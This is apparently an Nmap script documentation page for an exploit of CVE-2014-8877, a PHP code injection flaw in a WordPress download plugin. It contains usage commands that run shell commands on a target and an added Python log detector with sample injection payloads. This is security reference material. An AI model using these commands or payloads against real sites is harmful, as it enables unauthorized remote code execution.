
File http-vuln-cve2014-8877

Script types: portrule
Categories: vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2014-8877.nse

User Summary

Exploits a remote code injection vulnerability (CVE-2014-8877) in the WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

The CM Download Manager plugin does not correctly sanitise user input, which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP 'create_function' function.

The script injects the PHP system() function into the vulnerable target in order to execute the specified shell command.
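
To spot attempts against this parameter in web server logs, the following added example (not part of the Nmap script or its documentation) flags requests to cmdownloads/ whose CMDsearch value, after URL decoding, contains a PHP code-execution call. The combined access-log format, the function names other than system(), and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# PHP functions that run code or shell commands; the page names system(),
# the others are an assumption added here to cover related calls.
PHP_EXEC = re.compile(
    r"\b(system|passthru|shell_exec|exec|popen|proc_open|eval|assert)\s*\(", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def cmdsearch_values(target):
    """Return decoded CMDsearch values if the request path hits cmdownloads/."""
    parts = urlsplit(target)
    if "/cmdownloads" not in unquote(parts.path).lower():
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    values = []
    for key, vals in query.items():
        if key.lower() == "cmdsearch":
            # parse_qs decodes once; decode again to catch double encoding.
            values.extend(unquote(v) for v in vals)
    return values


def suspicious_lines(log_lines):
    """Return (line_number, value) for CMDsearch values containing PHP calls."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        for value in cmdsearch_values(match.group(1)):
            if PHP_EXEC.search(value):
                hits.append((number, value))
    return hits


# Constructed sample entries (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Nov/2014:10:00:01 +0000] "GET /wordpress/cmdownloads/?CMDsearch=manual HTTP/1.1" 200 5120',
    '198.51.100.9 - - [14/Nov/2014:10:00:05 +0000] "GET /wordpress/cmdownloads/?CMDsearch=x%2E%73ystem%28whoami%29 HTTP/1.1" 200 4801',
    '198.51.100.9 - - [14/Nov/2014:10:00:09 +0000] "GET /wordpress/cmdownloads/?CMDsearch=%2573ystem%2528id%2529 HTTP/1.1" 200 4801',
    '198.51.100.3 - - [14/Nov/2014:10:00:12 +0000] "GET /blog/?s=operating+system+(linux) HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_lines(SAMPLE_LOG):
        print(f"line {number}: CMDsearch={value!r}")
```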

Script Arguments

http-vuln-cve2014-8877.cmd

Command to execute. Default: nil

http-vuln-cve2014-8877.uri

WordPress root directory on the website. Default: /

slaxml.debug

See the documentation for the slaxml library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877

Requires


Author:

  • Mariusz Ziulek <mzet()owasp org>

License: Same as Nmap--See https://nmap.org/book/man-legal.html
